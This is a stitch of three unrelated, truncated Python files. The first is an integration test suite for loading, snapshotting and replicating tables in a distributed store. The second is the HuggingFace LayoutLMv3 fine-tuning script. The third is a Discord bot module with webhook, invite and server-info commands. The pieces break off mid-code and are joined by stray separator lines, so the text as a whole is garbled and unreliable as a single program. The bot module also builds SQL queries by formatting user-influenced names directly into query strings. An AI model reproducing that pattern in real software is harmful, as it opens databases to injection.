table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
# for multidimension test
self.multidimension_vk = {'card': ('string:index', 'testkey111'),
'merchant': ('string:index', 'testvalue111'),
'amt': ('double', 1.1)}
self.multidimension_scan_vk = {'card': 'testkey111'}
rs4 = self.put(self.slave1,
self.tid,
self.pid,
'testkey111',
self.now(),
'testvalue111')
self.assertIn('Put ok', rs4)
self.assertIn(
'testvalue111', self.scan(self.slave1, self.tid, self.pid, 'testkey111', self.now(), 1))
def test_loadtable_newslave_success_cannot_put(self):
"""
拷贝db目录后loadtable,功能正常
新节点是从节点,loadtable后不可以put数据
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 6):
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() - i,
'testvalue')
time.sleep(1)
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
# 新从节点loadtable后不可以put数据
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['6', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
# for multidimension test
self.multidimension_vk = {'card': ('string:index', 'testkey111'),
'merchant': ('string:index', 'testvalue111'),
'amt': ('double', 1.1)}
rs4 = self.put(self.slave1,
self.tid,
self.pid,
'testkey111',
self.now(),
'testvalue111')
self.assertIn('Put failed', rs4)
self.multidimension_scan_vk = {'card': 'testkey111'} # for multidimension test
self.assertFalse(
'testvalue111' in self.scan(self.slave1, self.tid, self.pid, 'testkey111', self.now(), 1))
def test_loadtable_failed_after_drop(self):
"""
drop表后不可以重新loadtable
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 3):
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() - i,
'testvalue')
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
rs3 = self.drop(self.leader, self.tid, self.pid)
self.assertIn('Drop table ok', rs3)
time.sleep(1)
rs4 = self.loadtable(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertFalse('Fail' not in rs4)
@multi_dimension(False)
def test_loadtable_andthen_sync_from_leader(self):
"""
从节点loadtable后可以同步主节点后写入的数据
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
self.put(self.leader,
self.tid,
self.pid,
'k1',
self.now(),
'v1')
time.sleep(1)
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
self.assertIn('LoadTable ok', rs3)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
rs4 = self.put(self.leader,
self.tid,
self.pid,
'k2',
self.now(),
'v2')
self.assertIn('Put ok', rs4)
time.sleep(1)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['2', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
@multi_dimension(True)
def test_loadtable_andthen_sync_from_leader_md(self):
"""
从节点loadtable后可以同步主节点后写入的数据
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'',
self.now(),
'v1', '1.1', 'k1')
time.sleep(1)
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('LoadTable ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
rs3 = self.put(self.leader, self.tid, self.pid, '', self.now(), 'v2', '1.1', 'k2')
self.assertIn('Put ok', rs3)
time.sleep(1)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['2', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
@multi_dimension(False)
def test_loadtable_ttl_removed_expired_key(self):
"""
节点1 插入部分过期数据,makesnapshot
拷贝db目录到节点2
节点2 loadtable时会剔除过期的key
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 6):
self.put(self.leader,
self.tid,
self.pid,
'testkey{}'.format(i),
self.now() - (100000000000 * (i % 2) + 1),
'testvalue{}'.format(i))
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
time.sleep(3)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
# 未过期key可以scan出来,过期key scan不出来
self.assertIn('testvalue0', self.scan(self.slave1, self.tid, self.pid, 'testkey0', self.now(), 1))
self.assertFalse('testvalue1' in self.scan(self.slave1, self.tid, self.pid, 'testkey1', self.now(), 1))
table_status = self.get_table_status(self.leader, self.tid, self.pid)
self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
@multi_dimension(True)
def test_loadtable_ttl_removed_expired_key_md(self):
"""
节点1 插入部分过期数据,makesnapshot
拷贝db目录到节点2
节点2 loadtable时会剔除过期的key
:return:
"""
kv = {'card': ('string:index', ''), 'card2': ('string', '')}
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
for i in range(6):
kv = {'card': ('string:index', 'card' + str(i)), 'card2': ('string', 'value' + str(i))}
self.put(self.leader, self.tid, self.pid, '',
self.now() - (100000000000 * (i % 2) + 1),
*[str(v[1]) for v in kv.values()])
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
time.sleep(3)
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
# 未过期key可以scan出来,过期key scan不出来
self.assertIn('value0', self.scan(self.slave1, self.tid, self.pid, {'card': 'card0'}, self.now(), 1))
self.assertNotIn('value1', self.scan(self.slave1, self.tid, self.pid, {'card': 'card1'}, self.now(), 1))
table_status = self.get_table_status(self.leader, self.tid, self.pid)
self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
def test_loadtable_ttl_zero(self):
"""
ttl为0,loadtable时可以load所有数据,无过期
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 0)
self.assertIn('Create table ok', rs1)
for i in range(0, 3):
# for multidimension test
self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
'merchant': ('string:index', 'testvalue{}'.format(i)),
'amt': ('double', 1.1)}
self.put(self.leader,
self.tid,
self.pid,
'testkey{}'.format(i),
self.now() - 100000000000,
'testvalue{}'.format(i))
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 0)
self.assertIn('LoadTable ok', rs3)
# 所有数据不过期,全部scan出来
for i in range(0, 3):
self.multidimension_scan_vk = {'card': 'testkey{}'.format(i)} # for multidimension test
rs = self.scan(self.slave1, self.tid, self.pid, 'testkey{}'.format(i), self.now(), 1)
self.assertIn('testvalue{}'.format(i), rs)
def test_loadtable_failed_table_exist(self):
"""
table已存在,不允许loadtable
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now(),
'testvalue')
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 新节点创建table
rs3 = self.create(self.slave1, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs3)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('Fail to LoadTable', rs4)
def test_loadtable_can_be_pausedsnapshot_after_loadtable(self):
"""
loadtable以后,可以正常暂停snapshot
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now(),
'testvalue')
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
rs4 = self.pausesnapshot(self.slave1, self.tid, self.pid)
self.assertIn('PauseSnapshot ok', rs4)
table_status = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kSnapshotPaused', 'true', '144000min', '0s'])
# @multi_dimension(False)
def test_loadtable_by_snapshot_and_binlog(self):
"""
同时通过snapshot和binlog loadtable
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 3):
# for multidimension test
self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
'merchant': ('string:index', 'testvalue{}'.format(i)),
'amt': ('double', 1.1)}
self.put(self.leader,
self.tid,
self.pid,
'testkey{}'.format(i),
self.now() - i,
'testvalue{}'.format(i))
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
for i in range(3, 6):
# for multidimension test
self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
'merchant': ('string:index', 'testvalue{}'.format(i)),
'amt': ('double', 1.1)}
self.put(self.leader,
self.tid,
self.pid,
'testkey{}'.format(i),
self.now() - i,
'testvalue{}'.format(i))
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
for i in range(0, 6):
self.multidimension_scan_vk = {'card': 'testkey{}'.format(i)} # for multidimension test
rs = self.scan(self.slave1, self.tid, self.pid, 'testkey{}'.format(i), self.now(), 1)
self.assertIn('testvalue{}'.format(i), rs)
def test_loadtable_by_binlog_success(self):
"""
仅通过binlog loadtable
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() - 10,
'testvalue')
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点,删掉snapshot目录,保留binlog目录
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
utils.exe_shell('rm -rf {}/db/{}_{}/snapshot/*'.format(self.slave1path, self.tid, self.pid))
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
self.assertIn('LoadTable ok', rs3)
self.assertIn('testvalue', self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now(), 1))
rs4 = self.makesnapshot(self.slave1, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs4)
mf = self.get_manifest(self.slave1path, self.tid, self.pid)
self.assertEqual(mf['offset'], '1')
self.assertTrue(mf['name'])
self.assertEqual(mf['count'], '1')
def test_loadtable_by_binlog_ttl(self):
"""
binlog中包含过期数据
通过binlog loadtable,剔除过期数据
再makesnapshot可以成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 4):
# for multidimension test
self.multidimension_vk = {'card': | |
#!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning LayoutLMv3 for token classification on FUNSD or CORD.
"""
# You can also adapt this script on your own token classification task and datasets. Pointers for this are left as
# comments.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import datasets
import numpy as np
from datasets import ClassLabel, load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForTokenClassification,
AutoProcessor,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.data.data_collator import default_data_collator
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.19.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/token-classification/requirements.txt")
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
default="microsoft/layoutlmv3-base",
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
processor_name: Optional[str] = field(
default=None, metadata={"help": "Name or path to the processor files if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
)
},
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
task_name: Optional[str] = field(default="ner", metadata={"help": "The name of the task (ner, pos...)."})
dataset_name: Optional[str] = field(
default="nielsr/funsd-layoutlmv3",
metadata={"help": "The name of the dataset to use (via the datasets library)."},
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(
default=None, metadata={"help": "The input training data file (a csv or JSON file)."}
)
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate on (a csv or JSON file)."},
)
test_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input test data file to predict on (a csv or JSON file)."},
)
text_column_name: Optional[str] = field(
default=None, metadata={"help": "The column name of text to input in the file (a csv or JSON file)."}
)
label_column_name: Optional[str] = field(
default=None, metadata={"help": "The column name of label to input in the file (a csv or JSON file)."}
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
max_seq_length: int = field(
default=512,
metadata={
"help": (
"The maximum total input sequence length after tokenization. If set, sequences longer "
"than this will be truncated, sequences shorter will be padded."
)
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of prediction examples to this "
"value if set."
)
},
)
label_all_tokens: bool = field(
default=False,
metadata={
"help": (
"Whether to put the label for one word on all tokens of generated by that word or just on the "
"one (in which case the other tokens will have a padding index)."
)
},
)
return_entity_level_metrics: bool = field(
default=False,
metadata={"help": "Whether to return all the entity levels during evaluation or just the overall ones."},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
self.task_name = self.task_name.lower()
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name == "funsd":
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
"nielsr/funsd-layoutlmv3",
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
elif data_args.dataset_name == "cord":
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
"nielsr/cord-layoutlmv3",
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
raise ValueError("This script only supports either FUNSD or CORD out-of-the-box.")
if training_args.do_train:
column_names = dataset["train"].column_names
features = dataset["train"].features
else:
column_names = dataset["test"].column_names
features = dataset["test"].features
image_column_name = "image"
text_column_name = "words" if "words" in column_names else "tokens"
boxes_column_name = "bboxes"
label_column_name = (
f"{data_args.task_name}_tags" if f"{data_args.task_name}_tags" in column_names else column_names[1]
)
remove_columns = column_names
# In the event the labels are not a `Sequence[ClassLabel]`, we will need to go through the dataset to get the
# unique labels.
def get_label_list(labels):
unique_labels = set()
for label in labels:
unique_labels = unique_labels | set(label)
label_list = list(unique_labels)
label_list.sort()
return label_list
# If the labels are of type ClassLabel, they are already integers and we have the map stored somewhere.
# Otherwise, we have to get the list of labels manually.
if isinstance(features[label_column_name].feature, ClassLabel):
label_list = features[label_column_name].feature.names
# No need to convert the labels since they are already ints.
id2label = {k: v for k, v in enumerate(label_list)}
label2id = {v: k for k, v in enumerate(label_list)}
else:
label_list = get_label_list(datasets["train"][label_column_name])
id2label = {k: v for k, v in enumerate(label_list)}
label2id = {v: k for k, v in enumerate(label_list)}
num_labels = len(label_list)
# Load pretrained model and processor
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
| |
import discord
import asyncio
import requests
import time
from datetime import datetime, date
import string
import random
import copy
import re
import json
import asyncpg
from bs4 import BeautifulSoup
from discord.ext import commands
from cogs.locale import *
from cogs.const import *
from cogs.help import *
from cogs.ids import *
from cogs.util import *
from cogs.discord_hooks import Webhook
from config.constants import *
support_url = "https://discord.gg/tomori"
site_url = "http://discord.band"
site_commands_url = "https://discord.band/commands"
invite_url = "https://discordapp.com/api/oauth2/authorize?client_id=491605739635212298&permissions=536341719&redirect_uri=https%3A%2F%2Fdiscord.band&scope=bot"
async def o_webhook(client, conn, context, name, value):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
dat = await conn.fetchrow("SELECT * FROM mods WHERE type = 'webhook' AND name = '{name}' AND server_id = '{server_id}'".format(server_id=server_id, name=clear_name(name).lower()))
if not dat:
em.description = locale[lang]["other_webhook_not_exists"].format(
who=tagged_dname(message.author),
name=name
)
await client.send_message(message.channel, embed=em)
return
if dat["condition"]:
cond = dat["condition"]
else:
cond = ""
if not any(cond==role.id or role.permissions.administrator for role in message.author.roles) and not cond==message.author.id and not message.author.id == message.server.owner.id:
return
try:
await client.delete_message(message)
except:
pass
try:
ret = json.loads(value)
if ret and isinstance(ret, dict):
msg = Webhook(web_url=dat["value"], **ret)
await msg.post()
else:
msg = Webhook(
web_url=dat["value"],
text=value
)
await msg.post()
except:
msg = Webhook(
web_url=dat["value"],
text=value
)
await msg.post()
async def o_about(client, conn, context):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
try:
await client.delete_message(message)
except:
pass
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
if const["locale"] == "english":
em.description = "***Python-bot created by __Pineapple Cookie#0373__\n\
supported by __Unknown__ and __Teris__.***\n\n\
**[Support server]({support_url})**\n\
**[Site]({site_url})**\n\n\
For any questions talk to <@499937748862500864>.".format(support_url=support_url, site_url=site_url)
else:
em.description = "***Python-bot написанный __Ананасовой Печенюхой__\n\
при поддержке __Unknown'a__ и __Teris'а__.***\n\n\
**[Ссылка на сервер поддержки]({support_url})**\n\
**[Ссылка на сайт]({site_url})**\n\n\
По всем вопросам обращайтесь к <@499937748862500864>.".format(support_url=support_url, site_url=site_url)
if not message.server.id in servers_without_follow_us:
em = await add_follow_links(client, message, const, em)
await client.send_message(message.channel, embed=em)
return
async def o_invite(client, conn, context):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
try:
await client.delete_message(message)
except:
pass
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
em.title = locale[lang]["other_invite_title"]
em.description = invite_url
if not message.server.id in servers_without_follow_us:
em = await add_follow_links(client, message, const, em)
await client.send_message(message.author, embed=em)
return
standart = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
def clear_code(code_):
_code = ""
for symbol in code_:
if symbol in standart:
_code = _code + symbol
return _code[:8]
def generate_code():
i = 0
code_ = ""
while i < 8:
i += 1
code_ = code_ + random.choice(standart)
return code_
async def o_inv(client, conn, context, code, name):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
inv = await client.get_invite(code)
if not inv:
em.description = locale[lang]["not_invite"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
inv = "https://discord.gg/{}".format(inv.code)
codes = await conn.fetch("SELECT name FROM mods WHERE type='custom_invite'")
def check_code(code_):
return any(code_ == _code["name"] for _code in codes)
if not name:
name = generate_code()
while check_code(name):
name = generate_code()
else:
name = clear_code(name.lower())
if len(name) < 3:
em.description = locale[lang]["invite_cant_be_less"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
if check_code(name):
em.description = locale[lang]["invite_taken"].format(who=tagged_dname(message.author), invite=name)
await client.send_message(message.channel, embed=em)
return
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
em.description = locale[lang]["invite_successfully_installed"].format(who=tagged_dname(message.author), invite=name)
if not message.server.id in servers_without_follow_us:
em = await add_follow_links(client, message, const, em)
await asyncio.wait([
client.send_message(message.channel, embed=em),
client.delete_message(message),
conn.execute("INSERT INTO mods(server_id, name, type, value, condition) VALUES('{server}', '{code}', 'custom_invite', '{url}', '{who}')".format(
server=server_id,
code=name,
url=inv,
who="{} [{}]".format(tagged_name(message.author), message.author.id)
))
])
return
async def o_server(client, conn, context):
message = context.message
server_id = message.server.id
server = message.server
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
try:
await client.delete_message(message)
except:
pass
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
name = server.name
badges = ""
if const["is_unverified"]:
badges = "💩"
else:
if const["is_partner"]:
badges += "<:partner:559064087699390524> "
if const["is_nitro"]:
badges += "<:nitro:528886245510742017> "
if const["is_verified"]:
badges += "<:verified:551470498920529921> "
if not badges:
badges = locale[lang]["no"]
em.set_author(name=name, icon_url=server.icon_url)
em.add_field(
name=locale[lang]["other_server_owner"],
value="{0.name}#{0.discriminator}".format(server.owner),
inline=True
)
em.add_field(
name=locale[lang]["other_server_prefix"],
value=const["prefix"],
inline=True
)
em.add_field(
name=locale[lang]["other_server_badges"],
value=badges,
inline=True
)
em.add_field(
name=locale[lang]["other_server_bank"],
value=str(const["bank"]),
inline=True
)
em.add_field(
name=locale[lang]["other_server_channels"],
value=str(len(server.channels)),
inline=True
)
em.add_field(
name=locale[lang]["other_server_members"],
value=str(len(server.members)),
inline=True
)
em.add_field(
name=locale[lang]["other_server_lifetime"],
value=locale[lang]["other_server_days"].format(int((datetime.utcnow() - server.created_at).days)),
inline=True
)
em.add_field(
name=":satellite:ID",
value=server.id,
inline=True
)
em.add_field(
name=locale[lang]["other_server_emojis"],
value=str(len(server.emojis)),
inline=True
)
icon_url = message.server.icon_url
if not icon_url:
icon_url = client.user.default_avatar_url
else:
icon_url = "https://cdn.discordapp.com/icons/{id}/{icon}.png".format(
id=message.server.id,
icon=message.server.icon
)
em.set_thumbnail(url=icon_url)
await client.send_message(message.channel, embed=em)
return
async def o_avatar(client, conn, context, who):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
try:
await client.delete_message(message)
except:
pass
if not who:
who = message.author
em.title = locale[lang]["other_avatar"].format(clear_name(who.display_name[:50]))
em.set_image(url=who.avatar_url)
await client.send_message(message.channel, embed=em)
return
async def o_urban(client, conn, context, text):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
